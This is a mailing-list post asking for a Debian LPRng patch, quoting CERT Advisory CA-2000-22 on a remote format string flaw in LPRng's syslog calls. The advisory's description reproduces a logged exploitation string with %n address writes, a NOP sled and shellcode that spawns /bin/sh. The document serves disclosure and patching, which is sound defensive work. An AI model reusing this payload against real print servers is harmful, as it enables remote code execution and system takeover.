[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

lprng


Does anyone know where can I find a debian-specific patch for the
lprng package?

Thanks in advance.

Why? Just read the following...

> Subject: CERT Advisory CA-2000-22
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> CERT Advisory CA-2000-22 Input Validation Problems in LPRng
> 
>    Original release date: December 12, 2000
>    Last updated: --
>    Source: CERT/CC
> 
>    A complete revision history is at the end of this file.
> 
> Systems Affected
> 
>      * Systems running unpatched LPRng software
> 
> Overview
> 
>    A popular replacement software package to the BSD lpd printing service
>    called LPRng contains at least one software defect, known as a "format
>    string vulnerability,"[1] which may allow remote users to execute
>    arbitrary code on vulnerable systems.
> 
> I. Description
> 
>    LPRng, now being packaged in several open-source operating system
>    distributions, has a missing format string argument in at least two
>    calls to the syslog() function.
> 
>    Missing format strings in function calls allow user-supplied arguments
>    to be passed to a susceptible *snprintf() function call. Remote users
>    with access to the printer port (port 515/tcp) may be able to pass
>    format-string parameters that can overwrite arbitrary addresses in the
>    printing service's address space. Such overwriting can cause
>    segmentation violations leading to denial of printing services or to
>    the execution of arbitrary code injected through other means into the
>    memory segments of the printer service.
> 
>    Sample syslog entries from successful exploitation of this
>    vulnerability have been reported, as follows:
> 
> Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
> 'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
> XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
> {90}{90}
> 1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
> ]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
> E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
> M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
> ?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
> E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
> 
>    This vulnerability has been assigned the identifier CAN-2000-0917 by
>    the Common Vulnerabilities and Exposures (CVE) group:
> 
>           http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
> 
>    The CERT/CC has received reports of extensive probing to port 515/tcp.
>    In addition, we have received some reports of systems compromised
>    using this vulnerability. Tools exploiting this vulnerability have
>    been posted to public forums.
> 
> II. Impact
> 
>    A remote user may be able to execute arbitrary code with elevated
>    privileges.
> 
>    In addition, the printing service may be disrupted or disabled
>    entirely.
> 
> III. Solution
> 
> Apply a patch from your vendor
> 
>    Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
>    the vendor sections below. Alternately, you can obtain the version of
>    LPRng which fixes the missing format string at:
> 
>           ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
> 
> Disallow access to printer service ports (typically 515/tcp) using firewall
> or packet-filtering technologies
> 
>    Blocking access to the vulnerable service will limit your exposure to
>    attacks from outside your network perimeter. However, the
>    vulnerability would still allow local users to gain privileges they
>    normally shouldn't have; in addition, blocking port 515/tcp at a
>    network perimeter would still allow any remote user inside the
>    perimeter to exploit the vulnerability.
> 
> Appendix A. Vendor Information
> 
> Apple
> 
>    Apple has conducted an investigation and determined that Mac OS X
>    Public Beta and Mac OS X Server do not use LPRng and are therefore not
>    vulnerable to this exploitation.
> 
> Caldera OpenLinux
> 
>    See CSSA-2000-033.0 "format bug in LPRng" at:
> 
>           http://www.calderasystems.com/support/security/advisories/CSSA-
>           2000-033.0.txt 
> 
> Compaq Computer Corporation
> 
>    Compaq Tru64 UNIX S/W is not vulnerable.
> 
> FreeBSD
> 
>    FreeBSD does not include LPRng in the base system. Older versions of
>    FreeBSD included a vulnerable version of LPRng in the Ports Collection
>    but this was corrected almost 2 months ago, prior to the release of
>    FreeBSD 4.2. See FreeBSD Security Advisory 00:56
>    (ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lp
>    rng.asc) for more information.
> 
> Hewlett-Packard Company
> 
>    This does not apply to HP; HP does not ship LPRng on HP-UX.
> 
> IBM
> 
>    IBM's AIX operating system is not vulnerable to this security exploit.
> 
> Microsoft Corporation
> 
>    Microsoft doesn't use LPRng in any of its products, so no Microsoft
>    products are affected by the vulnerability.
> 
> NetBSD
> 
>    NetBSD does not include LPRng in the base system; however we do have a
>    third-party package of LPRng-3.6.8 which is vulnerable. There's work
>    underway to upgrade it to a non-vulnerable version.
> 
> OpenBSD
> 
>    OpenBSD does not ship lprng.
> 
> RedHat
> 
>    LPRng Version 3.6.24 and earlier is vulnerable.
> 
>    See RHSA-2000:065-04 at:
> 
>           http://www.redhat.com/support/errata/RHSA-2000-065-06.html
> 
> SGI
> 
>    IRIX does not contain LPRng support.
> 
> SuSE
> 
>    SuSE is not vulnerable. Please see additional comments at:
> 
>           http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
> 
> References
> 
>     1. VU#382365: LPRng can pass user-supplied input as a format string
>        parameter to syslog() calls, CERT/CC, 10/06/2000,
>        https://www.kb.cert.org/vuls/id/382365
>    _________________________________________________________________
> 
>    The CERT Coordination Center thanks Chris Evans for his initial report
>    on the vulnerability described in this advisory.
>    _________________________________________________________________
> 
>    Author: This document was written by Jeffrey S Havrilla. Feedback on
>    this advisory is appreciated.
>    ______________________________________________________________________
> 
>    This document is available from:
>    http://www.cert.org/advisories/CA-2000-22.html
>    ______________________________________________________________________
> 
> CERT/CC Contact Information
> 
>    Email: cert@cert.org
>           Phone: +1 412-268-7090 (24-hour hotline)
>           Fax: +1 412-268-6989
>           Postal address:
>           CERT Coordination Center
>           Software Engineering Institute
>           Carnegie Mellon University
>           Pittsburgh PA 15213-3890
>           U.S.A.
> 
>    CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
>    Monday through Friday; they are on call for emergencies during other
>    hours, on U.S. holidays, and on weekends.
> 
> Using encryption
> 
>    We strongly urge you to encrypt sensitive information sent by email.
>    Our public PGP key is available from
> 
>    http://www.cert.org/CERT_PGP.key
> 
>    If you prefer to use DES, please call the CERT hotline for more
>    information.
> 
> Getting security information
> 
>    CERT publications and other security information are available from
>    our web site
> 
>    http://www.cert.org/
> 
>    To subscribe to the CERT mailing list for advisories and bulletins,
>    send email to majordomo@cert.org. Please include in the body of your
>    message
> 
>    subscribe cert-advisory
> 
>    * "CERT" and "CERT Coordination Center" are registered in the U.S.
>    Patent and Trademark Office.
>    ______________________________________________________________________
> 
>    NO WARRANTY
>    Any material furnished by Carnegie Mellon University and the Software
>    Engineering Institute is furnished on an "as is" basis. Carnegie
>    Mellon University makes no warranties of any kind, either expressed or
>    implied as to any matter including, but not limited to, warranty of
>    fitness for a particular purpose or merchantability, exclusivity or
>    results obtained from use of the material. Carnegie Mellon University
>    does not make any warranty of any kind with respect to freedom from
>    patent, trademark, or copyright infringement.
>    _________________________________________________________________
> 
>    Conditions for use, disclaimers, and sponsorship information
> 
>    Copyright 2000 Carnegie Mellon University.
> 
>    Revision History
> 	Dec 12, 2000: Initial Release
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: PGP for Personal Privacy 5.0
> Charset: noconv
> 
> iQCVAwUBOjYxtAYcfu8gsZJZAQEp/wP/Zo5uIe1y9vbTEmQz6CtlkLaejrEzzRua
> eBakIkIz5CzLKL3+zMFsmTaC306fgFnOcV3lz9NmAzNLg8mqFZYruaTTVuTeY0Yg
> +QTWG6DngiqH8ttKV91MjPGZZFpUWahVvVk+xUU/fLCMoc9FAUAenYoOfuduD9nO
> w8+1WAtQPUs=
> =bNBX
> -----END PGP SIGNATURE-----
Reply to: